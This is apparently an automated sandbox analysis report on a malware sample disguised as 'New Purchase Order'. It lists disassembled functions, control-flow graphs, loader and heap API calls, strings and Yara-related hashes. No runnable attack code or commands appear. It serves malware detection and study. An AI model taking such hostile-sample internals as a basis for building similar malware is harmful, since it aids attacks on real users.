                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: UQ63g7r-$UQ63g7r-
                                                          • API String ID: 1836367815-2341035416
                                                          • Opcode ID: 3c4c82ffe9e2637f9c0b03e17c2ef05438faead3bb8494bc245809be69176afb
                                                          • Instruction ID: 7656ebaa64e068870cd233fd54207e833a46b1e9e0b7fb7ddf8ec8f242163898
                                                          • Opcode Fuzzy Hash: 3c4c82ffe9e2637f9c0b03e17c2ef05438faead3bb8494bc245809be69176afb
                                                          • Instruction Fuzzy Hash: CF01D2B2D4021C7AEB10ABE19CC2DEF7B7CDF40798F408069FA04B7240D6785E068BA5
                                                          Function 00417BDE Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 333 417bde-417bdf 334 417be1-417bf3 333->334 335 417c55-417c67 333->335 339 417c2e-417c38 334->339 336 417c68-417c70 335->336 336->339 340 417c72-417c74 336->340 339->335 341 417c3a-417c3b 339->341 340->336 342 417c76-417c7a 340->342 343 417bca-417bd7 LdrLoadDll 341->343 344 417c3d 341->344 345 417c8c-417c98 342->345 346 417c7c-417c82 342->346 349 417bda-417bdd 343->349 344->335 350 417c99-417cae 345->350 347 417cc0-417cc1 346->347 348 417c84 346->348 348->350 351 417c87 348->351 352 417cb0 350->352 353 417d17-417d2b call 42b9b3 350->353 351->345 355 417cb2-417cbe 352->355 356 417d2e-417d3f 352->356 353->356 355->347
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 192c4f8d791a74f5fc4a3e9ce53003c0e739193646856a7bd5574ecafb04c77f
                                                          • Instruction ID: c5951bf59670ed95c8a229a69371e0f0c9dc29fdd02334928d99ddc3ca0f2906
                                                          • Opcode Fuzzy Hash: 192c4f8d791a74f5fc4a3e9ce53003c0e739193646856a7bd5574ecafb04c77f
                                                          • Instruction Fuzzy Hash: 29219EB67442051FC315CE64EC81BF9B734EB92325F11029AF904CF381E6255D56C7E5
                                                          Function 00417BF8 Relevance: 1.6, APIs: 1, Instructions: 96libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 358 417bf8-417c23 360 417c70 358->360 361 417c25-417c28 358->361 362 417c72-417c74 360->362 363 417c2e-417c38 360->363 364 417be5-417bf3 361->364 365 417c2a 361->365 368 417c76-417c7a 362->368 369 417c68-417c6e 362->369 366 417c55-417c67 363->366 367 417c3a-417c3b 363->367 364->358 370 417bb8-417bc1 365->370 371 417c2c-417c38 365->371 366->369 372 417bca-417bd7 LdrLoadDll 367->372 373 417c3d 367->373 374 417c8c-417c98 368->374 375 417c7c-417c82 368->375 369->360 376 417bc3-417bc9 370->376 377 417bda-417bdd 370->377 371->366 371->367 372->377 373->366 380 417c99-417cae 374->380 378 417cc0-417cc1 375->378 379 417c84 375->379 376->372 379->380 381 417c87 379->381 382 417cb0 380->382 383 417d17-417d2b call 42b9b3 380->383 381->374 385 417cb2-417cbe 382->385 386 417d2e-417d3f 382->386 383->386 385->378
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 05ce74115300aa1d0386c8a992e5465be043cc1f53121675ba303ccf5aa30423
                                                          • Instruction ID: 00ac5599f99533841f8bda13b0be2f1b62a40995406928251777d9fad877b1ce
                                                          • Opcode Fuzzy Hash: 05ce74115300aa1d0386c8a992e5465be043cc1f53121675ba303ccf5aa30423
                                                          • Instruction Fuzzy Hash: CD21AB3A70C10A9FCB118E24D844AEAFF74EF96719B2041DAD450CB342E226A98687D8
                                                          Function 0042CC63 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 404 42cc63-42cca1 call 404643 call 42db53 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(?,0041E8EB,?,?,00000000,?,0041E8EB,?,?,?), ref: 0042CC9C
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: a629522e6cb8f85e8bdb182f51a111a0892afd8ed588c6852a699a7bde638c1b
                                                          • Instruction ID: 7c74d4e41703ecf2ac74f9d9b4895f51b419b40aa0f09aed774a1cc672b14946
                                                          • Opcode Fuzzy Hash: a629522e6cb8f85e8bdb182f51a111a0892afd8ed588c6852a699a7bde638c1b
                                                          • Instruction Fuzzy Hash: 3DE09AB22042187BCA14EF5AEC41F9B37ACEFC9710F004419FA08A7341D675BA108BB8
                                                          Function 0042CCA3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 409 42cca3-42cce1 call 404643 call 42db53 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,004173E4,000000F4), ref: 0042CCDC
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: cdd6b400f2d781c627cbe586a591c7bbeaa857b726842983189184a5aa92914a
                                                          • Instruction ID: 17ffdd14cf893de34d185b730fd02e884b2db9c7d9af60b921a6e04f82d44752
                                                          • Opcode Fuzzy Hash: cdd6b400f2d781c627cbe586a591c7bbeaa857b726842983189184a5aa92914a
                                                          • Instruction Fuzzy Hash: C8E06D712002047BC610EE49DC42F9B37ACEFC5714F004419F908A7341D674B9108AB8
                                                          Function 0042CCE3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 419 42cce3-42cd1f call 404643 call 42db53 ExitProcess
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,9A0A6B39,?,?,9A0A6B39), ref: 0042CD1A
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: ff46c3749a6ab0d7dff1e82a35f795f13fa1c0c29bc4e148dcdef1bc45769d99
                                                          • Instruction ID: db584931667c167d052b57122e12c945e868705e8a3680be29b3f7ccc7343bef
                                                          • Opcode Fuzzy Hash: ff46c3749a6ab0d7dff1e82a35f795f13fa1c0c29bc4e148dcdef1bc45769d99
                                                          • Instruction Fuzzy Hash: 49E04F356442147BC610AA5ADC01F9B775CEBC5754F414419FA0CA7241D675791187E4
                                                          Function 01882C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 424 1882c0a-1882c0f 425 1882c1f-1882c26 LdrInitializeThunk 424->425 426 1882c11-1882c18 424->426
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 25c568d3a4d7bd35644b0a4e9c250b2ee4ab4787192ae70151bb10851203f2a9
                                                          • Instruction ID: 9be04a95600d7bea103aed8f3ad320dc10363052276b33fe723043c217e1d5ba
                                                          • Opcode Fuzzy Hash: 25c568d3a4d7bd35644b0a4e9c250b2ee4ab4787192ae70151bb10851203f2a9
                                                          • Instruction Fuzzy Hash: 23B09B719015C5C9DF11F7644A08717794177D1701F19C061D303C645F473CC2D5E276

                                                          Non-executed Functions

                                                          Function 018C2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2160512332
                                                          • Opcode ID: 468c3138d888b73533712920ee2678e2f8cb613fc3bd584b9def5ac63cf11e15
                                                          • Instruction ID: 0c9131460f77802a41f9aebe663033ebf2d1ec197f09164da2f71caf0d9855bc
                                                          • Opcode Fuzzy Hash: 468c3138d888b73533712920ee2678e2f8cb613fc3bd584b9def5ac63cf11e15
                                                          • Instruction Fuzzy Hash: 40929F71604346AFE721DF28C880F6BB7EABB84B54F04491DFA94D7291D770EA44CB92
                                                          Function 01878620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018B54CE
                                                          • Critical section debug info address, xrefs: 018B541F, 018B552E
                                                          • corrupted critical section, xrefs: 018B54C2
                                                          • Critical section address, xrefs: 018B5425, 018B54BC, 018B5534
                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018B540A, 018B5496, 018B5519
                                                          • double initialized or corrupted critical section, xrefs: 018B5508
                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 018B5543
                                                          • Critical section address., xrefs: 018B5502
                                                          • undeleted critical section in freed memory, xrefs: 018B542B
                                                          • Thread identifier, xrefs: 018B553A
                                                          • Invalid debug info address of this critical section, xrefs: 018B54B6
                                                          • 8, xrefs: 018B52E3
                                                          • Address of the debug info found in the active list., xrefs: 018B54AE, 018B54FA
                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018B54E2
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                          • API String ID: 0-2368682639
                                                          • Opcode ID: 3d6553741a082ab3f221321d31bb8754fdb42ea2e06463bdfb0b8098c327a43a
                                                          • Instruction ID: ecb8ec538926e63afb4168da860a987d0b5b74970527b2b8f44b8bb595a79e7e
                                                          • Opcode Fuzzy Hash: 3d6553741a082ab3f221321d31bb8754fdb42ea2e06463bdfb0b8098c327a43a
                                                          • Instruction Fuzzy Hash: B4817AB1A41358AFEB21CF99C889BAEBBF5BB49714F144119F504F7350D379AA80CB90
                                                          Function 018729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 018B261F
                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 018B2506
                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 018B2498
                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 018B2602
                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 018B2412
                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 018B2624
                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 018B2409
                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018B22E4
                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018B24C0
                                                          • @, xrefs: 018B259B
                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018B25EB
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                          • API String ID: 0-4009184096
                                                          • Opcode ID: 2eb518df33ed6dcc3f03000c9c730a8a13cc56ee25cd6db489b5988a89cfd626
                                                          • Instruction ID: 5bc9362ca4348b54b77441634a5b7e6d2a159697c32a7a83fdb4fedcdc93d05d
                                                          • Opcode Fuzzy Hash: 2eb518df33ed6dcc3f03000c9c730a8a13cc56ee25cd6db489b5988a89cfd626
                                                          • Instruction Fuzzy Hash: FD025EB1D002299BDB31DB58CC80BEAB7B9AF54704F4441DAE649E7241EB31AF84CF59
                                                          Function 018E8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                          • API String ID: 0-2515994595
                                                          • Opcode ID: 22a53382b35f89abf197eedf5c3c932b6b0fa62cd7001d910c773f3cc73757c4
                                                          • Instruction ID: 1c2ac3064a68083c9051e4f61dd60c6c80b13b04742eb2ece797303b4fae3b7a
                                                          • Opcode Fuzzy Hash: 22a53382b35f89abf197eedf5c3c932b6b0fa62cd7001d910c773f3cc73757c4
                                                          • Instruction Fuzzy Hash: 9151BD726043059BD325DF188848BAFBBECEF97744F14491DAA99C3245E771D708CB92
                                                          Function 018F0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                          • API String ID: 0-1700792311
                                                          • Opcode ID: 4e737b6d63ec80cc8d48fe0baf1ca9cd9eb5ca82e6f4f73dc0453d54ea353bdd
                                                          • Instruction ID: 479103ca7994c72ca58cd269465dd81f47bf72b69b1bac2a2d40fce60c7b3497
                                                          • Opcode Fuzzy Hash: 4e737b6d63ec80cc8d48fe0baf1ca9cd9eb5ca82e6f4f73dc0453d54ea353bdd
                                                          • Instruction Fuzzy Hash: 84D1EC35604685DFDB22DF68C441AA9BBF2FF9A704F09804DFA45DB212D738DA81CB51
                                                          Function 018C89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • HandleTraces, xrefs: 018C8C8F
                                                          • VerifierFlags, xrefs: 018C8C50
                                                          • VerifierDlls, xrefs: 018C8CBD
                                                          • AVRF: -*- final list of providers -*- , xrefs: 018C8B8F
                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 018C8A3D
                                                          • VerifierDebug, xrefs: 018C8CA5
                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 018C8A67
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                          • API String ID: 0-3223716464
                                                          • Opcode ID: 53f25aaae18758c8f68fb6c4a4c31f8e7214001776d3e1c9f26bb9a0b17ab854
                                                          • Instruction ID: af95ef197c00ee631cb12b27030c453b003ec4c43f98e1d5a674300a3dd5efeb
                                                          • Opcode Fuzzy Hash: 53f25aaae18758c8f68fb6c4a4c31f8e7214001776d3e1c9f26bb9a0b17ab854
                                                          • Instruction Fuzzy Hash: 28911572685716AFE321DF6CD880B5A7BA4AB95F14F06045CFA44EB241D770DF01CB92
                                                          Function 0184EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                          • API String ID: 0-1109411897
                                                          • Opcode ID: cdc775c1078d0350d3abf1869253cde3b5b4796f9eed4344a5fd3a3eb287e7cb
                                                          • Instruction ID: 465fb722b856df13d25e4b4ed15f9f5f1284fa953ccea826b6544037b3b12ac9
                                                          • Opcode Fuzzy Hash: cdc775c1078d0350d3abf1869253cde3b5b4796f9eed4344a5fd3a3eb287e7cb
                                                          • Instruction Fuzzy Hash: 00A23570A0562E8BEF65DF18C888BA9BBB5BF45304F5842E9D909E7251DB749F81CF00
                                                          Function 018763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-792281065
                                                          • Opcode ID: 2659052388c26bc47871eee7597fa393ac3f9f741ae0f9438f70e30c94b2a6a5
                                                          • Instruction ID: 2e37199d95438643ad1d6b50e2f41496fb3b2365238c55959ddc0de50e66a686
                                                          • Opcode Fuzzy Hash: 2659052388c26bc47871eee7597fa393ac3f9f741ae0f9438f70e30c94b2a6a5
                                                          • Instruction Fuzzy Hash: 65914870A047159BFB36DF1CD8C5BAA7BA1FB51B14F140128E516EB382E7748B41C792
                                                          Function 0183645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018999ED
                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01899A01
                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01899A2A
                                                          • apphelp.dll, xrefs: 01836496
                                                          • LdrpInitShimEngine, xrefs: 018999F4, 01899A07, 01899A30
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01899A11, 01899A3A
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-204845295
                                                          • Opcode ID: 63c3e93a629cb4eb59e1070dce009d9a385ed84a8d189f1c1dc0b3c0842ee42d
                                                          • Instruction ID: 57593272591f4c8fcee5684d0ea88694a17ccb619143ea5c6106606096b88a1e
                                                          • Opcode Fuzzy Hash: 63c3e93a629cb4eb59e1070dce009d9a385ed84a8d189f1c1dc0b3c0842ee42d
                                                          • Instruction Fuzzy Hash: F451A171648305AFE721DB28D881AAB77E9EB84748F18091DF586D7250E634DB44CB93
                                                          Function 0187C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpInitializeProcess, xrefs: 0187C6C4
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 018B8181, 018B81F5
                                                          • Loading import redirection DLL: '%wZ', xrefs: 018B8170
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0187C6C3
                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 018B81E5
                                                          • LdrpInitializeImportRedirection, xrefs: 018B8177, 018B81EB
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-475462383
                                                          • Opcode ID: 91e6aff9645ecde4d18f0ad235f071c2969d761af26e89794836dfb83c4790f6
                                                          • Instruction ID: 247392bad40d311a047fb780ebfbbc1c419cac1a125233cd511081b28e5fa2e3
                                                          • Opcode Fuzzy Hash: 91e6aff9645ecde4d18f0ad235f071c2969d761af26e89794836dfb83c4790f6
                                                          • Instruction Fuzzy Hash: 69310271648306ABD220EB2CDD86E6A7799AF95B10F00055CF945EB391E624EF04C7A3
                                                          Function 01872674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018B21BF
                                                          • SXS: %s() passed the empty activation context, xrefs: 018B2165
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 018B2178
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 018B2180
                                                          • RtlGetAssemblyStorageRoot, xrefs: 018B2160, 018B219A, 018B21BA
                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 018B219F
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                          • API String ID: 0-861424205
                                                          • Opcode ID: 8fc063fa1c09ea5e1c2a05a0f26b0dcea07ead11928b08eb08a821f00793942d
                                                          • Instruction ID: a9fb1c63cb52612255f33ccb31220a60b2c25dd529ce5810a79f33b842c5ceeb
                                                          • Opcode Fuzzy Hash: 8fc063fa1c09ea5e1c2a05a0f26b0dcea07ead11928b08eb08a821f00793942d
                                                          • Instruction Fuzzy Hash: 6A310836B4022577F7229A9A8CC5F9ABB7ADB64B90F054059FB04E7341D270EB41C6A1
                                                          Function 0188096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 01882DF0: LdrInitializeThunk.NTDLL ref: 01882DFA
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01880BA3
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01880BB6
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01880D60
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01880D74
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                          • String ID:
                                                          • API String ID: 1404860816-0
                                                          • Opcode ID: f85ae6a3610253f074de71606242ec238b3d12349a210670e736d44f76d4e03a
                                                          • Instruction ID: 265402dfbabf2abce77e3d6e2a99b8db56302ef36992db49d7185b5e41623456
                                                          • Opcode Fuzzy Hash: f85ae6a3610253f074de71606242ec238b3d12349a210670e736d44f76d4e03a
